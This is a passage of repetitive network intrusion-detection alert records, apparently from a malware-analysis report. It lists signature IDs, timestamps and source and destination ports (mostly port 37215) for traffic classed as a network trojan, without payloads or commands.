              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871835
              SID:2829579
              Source Port:57030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257463
              SID:2835222
              Source Port:52544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356123
              SID:2835222
              Source Port:37856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730306
              SID:2829579
              Source Port:53802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752136
              SID:2829579
              Source Port:56680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.932129
              SID:2835222
              Source Port:38466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349021
              SID:2835222
              Source Port:48808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508004
              SID:2835222
              Source Port:52982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824194
              SID:2835222
              Source Port:48246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868044
              SID:2829579
              Source Port:35864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048284
              SID:2829579
              Source Port:47752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155229
              SID:2835222
              Source Port:60380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057823
              SID:2829579
              Source Port:38692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092941
              SID:2835222
              Source Port:54194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672199
              SID:2829579
              Source Port:35894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241735
              SID:2829579
              Source Port:51476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401261
              SID:2829579
              Source Port:57338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543929
              SID:2829579
              Source Port:56802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487013
              SID:2835222
              Source Port:54008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.936231
              SID:2829579
              Source Port:35582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936631
              SID:2829579
              Source Port:47452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379815
              SID:2829579
              Source Port:51232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168777
              SID:2835222
              Source Port:51516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309441
              SID:2829579
              Source Port:42034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.799895
              SID:2835222
              Source Port:60316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176733
              SID:2829579
              Source Port:45236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440800
              SID:2829579
              Source Port:42974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011931
              SID:2829579
              Source Port:57292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.190991
              SID:2829579
              Source Port:51986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212320
              SID:2835222
              Source Port:33052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545128
              SID:2829579
              Source Port:55398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889504
              SID:2829579
              Source Port:58950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244567
              SID:2835222
              Source Port:34316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614131
              SID:2829579
              Source Port:36296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092637
              SID:2829579
              Source Port:34798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041992
              SID:2835222
              Source Port:55584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169141
              SID:2829579
              Source Port:36328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158078
              SID:2835222
              Source Port:60798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943518
              SID:2835222
              Source Port:59654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438285
              SID:2835222
              Source Port:44408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508672
              SID:2829579
              Source Port:55596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630060
              SID:2835222
              Source Port:55724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150745
              SID:2835222
              Source Port:54886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889765
              SID:2829579
              Source Port:59074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782311
              SID:2835222
              Source Port:41210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376911
              SID:2829579
              Source Port:46390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544714
              SID:2835222
              Source Port:50246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276612
              SID:2829579
              Source Port:38046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024422
              SID:2829579
              Source Port:36744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989529
              SID:2829579
              Source Port:56834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212245
              SID:2835222
              Source Port:49956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977275
              SID:2829579
              Source Port:37998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270851
              SID:2829579
              Source Port:51912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573054
              SID:2835222
              Source Port:47422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.061068
              SID:2835222
              Source Port:40754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731506
              SID:2835222
              Source Port:49386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803811
              SID:2829579
              Source Port:58888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246086
              SID:2835222
              Source Port:45060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126859
              SID:2835222
              Source Port:39928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192732
              SID:2835222
              Source Port:38760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.247026
              SID:2829579
              Source Port:53190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438654
              SID:2829579
              Source Port:44472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124452
              SID:2835222
              Source Port:52466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631380
              SID:2829579
              Source Port:37706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754451
              SID:2835222
              Source Port:50800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821735
              SID:2835222
              Source Port:52542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166423
              SID:2835222
              Source Port:44384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940658
              SID:2835222
              Source Port:54490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127306
              SID:2829579
              Source Port:44316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993129
              SID:2835222
              Source Port:36060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152605
              SID:2829579
              Source Port:42760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911471
              SID:2829579
              Source Port:55772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656407
              SID:2835222
              Source Port:43044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457630
              SID:2829579
              Source Port:33290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090544
              SID:2829579
              Source Port:56612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455133
              SID:2835222
              Source Port:45614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607571
              SID:2829579
              Source Port:48286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160705
              SID:2829579
              Source Port:54232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402477
              SID:2829579
              Source Port:59414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547119
              SID:2835222
              Source Port:44168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339640
              SID:2829579
              Source Port:40946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263033
              SID:2829579
              Source Port:44476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567166
              SID:2835222
              Source Port:37138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832919
              SID:2829579
              Source Port:55344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132791
              SID:2829579
              Source Port:39558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821247
              SID:2829579
              Source Port:54820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305301
              SID:2835222
              Source Port:51672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505366
              SID:2829579
              Source Port:57408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457242
              SID:2835222
              Source Port:35346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092180
              SID:2835222
              Source Port:45216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786152
              SID:2835222
              Source Port:46904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.792246
              SID:2835222
              Source Port:42594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569356
              SID:2835222
              Source Port:39572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129992
              SID:2829579
              Source Port:56246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676745
              SID:2835222
              Source Port:52114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246053
              SID:2829579
              Source Port:51846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091555
              SID:2835222
              Source Port:50734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305791
              SID:2835222
              Source Port:32912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343972
              SID:2829579
              Source Port:49808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457973
              SID:2835222
              Source Port:57588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697080
              SID:2835222
              Source Port:39304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130208
              SID:2835222
              Source Port:47806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749130
              SID:2829579
              Source Port:59292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552681
              SID:2829579
              Source Port:55792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610466
              SID:2835222
              Source Port:38606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.489078
              SID:2829579
              Source Port:37782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087409
              SID:2835222
              Source Port:54752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402875
              SID:2835222
              Source Port:58852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.232108
              SID:2835222
              Source Port:44798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751332
              SID:2829579
              Source Port:37910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487592
              SID:2829579
              Source Port:42846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823321
              SID:2829579
              Source Port:36838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216179
              SID:2829579
              Source Port:53858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451151
              SID:2829579
              Source Port:39698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375145
              SID:2829579
              Source Port:58996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074189
              SID:2829579
              Source Port:59690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306176
              SID:2835222
              Source Port:52744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164941
              SID:2835222
              Source Port:33898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129916
              SID:2835222
              Source Port:54338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264526
              SID:2835222
              Source Port:39820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573332
              SID:2835222
              Source Port:46252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376723
              SID:2835222
              Source Port:57248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633867
              SID:2829579
              Source Port:57264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568874
              SID:2835222
              Source Port:38444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843829
              SID:2835222
              Source Port:58994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307263
              SID:2835222
              Source Port:35482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835550
              SID:2835222
              Source Port:43046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169062
              SID:2835222
              Source Port:34910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:59.769102
              SID:2840515
              Source Port:41110
              Destination Port:4554
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943648
              SID:2835222
              Source Port:37134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.247715
              SID:2829579
              Source Port:34636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158199
              SID:2835222
              Source Port:46628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437572
              SID:2835222
              Source Port:44154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658070
              SID:2829579
              Source Port:42144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055350
              SID:2835222
              Source Port:58712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695295
              SID:2829579
              Source Port:59404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123827
              SID:2835222
              Source Port:36926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349499
              SID:2835222
              Source Port:58690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502702
              SID:2835222
              Source Port:32956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376865
              SID:2835222
              Source Port:48842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180335
              SID:2829579
              Source Port:54314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248529
              SID:2835222
              Source Port:51430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276375
              SID:2829579
              Source Port:33804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908940
              SID:2829579
              Source Port:51358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800818
              SID:2835222
              Source Port:47954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406268
              SID:2829579
              Source Port:46508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160785
              SID:2829579
              Source Port:52926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630975
              SID:2835222
              Source Port:39086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027709
              SID:2835222
              Source Port:52912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.615164
              SID:2835222
              Source Port:57392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455031
              SID:2835222
              Source Port:45704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041625
              SID:2829579
              Source Port:42018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012300
              SID:2829579
              Source Port:59956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438550
              SID:2835222
              Source Port:49758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166681
              SID:2829579
              Source Port:40882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245472
              SID:2829579
              Source Port:38268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124854
              SID:2835222
              Source Port:37518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833937
              SID:2835222
              Source Port:42876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090061
              SID:2829579
              Source Port:35226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279880
              SID:2835222
              Source Port:51292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300154
              SID:2835222
              Source Port:57808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835237
              SID:2829579
              Source Port:47288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486335
              SID:2835222
              Source Port:47940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678918
              SID:2829579
              Source Port:56172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265866
              SID:2835222
              Source Port:33980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833263
              SID:2835222
              Source Port:50812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043236
              SID:2835222
              Source Port:41700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267003
              SID:2829579
              Source Port:33422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076276
              SID:2829579
              Source Port:38902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455958
              SID:2835222
              Source Port:43684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040883
              SID:2829579
              Source Port:60994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791460
              SID:2829579
              Source Port:49404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158344
              SID:2829579
              Source Port:50134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302937
              SID:2835222
              Source Port:56218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941998
              SID:2835222
              Source Port:40766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259361
              SID:2829579
              Source Port:38878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942228
              SID:2835222
              Source Port:39664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231221
              SID:2835222
              Source Port:34920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833124
              SID:2835222
              Source Port:35846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376466
              SID:2835222
              Source Port:49134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404393
              SID:2835222
              Source Port:40258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475411
              SID:2835222
              Source Port:43114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089524
              SID:2829579
              Source Port:44028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989146
              SID:2829579
              Source Port:44196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154148
              SID:2829579
              Source Port:36894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344363
              SID:2829579
              Source Port:47974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731117
              SID:2835222
              Source Port:41358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868131
              SID:2829579
              Source Port:45562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041316
              SID:2829579
              Source Port:55506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785545
              SID:2835222
              Source Port:46836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510357
              SID:2835222
              Source Port:50302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993231
              SID:2835222
              Source Port:39130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402208
              SID:2829579
              Source Port:46190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676570
              SID:2829579
              Source Port:54648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246627
              SID:2835222
              Source Port:32778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154653
              SID:2829579
              Source Port:49634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028039
              SID:2835222
              Source Port:59564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
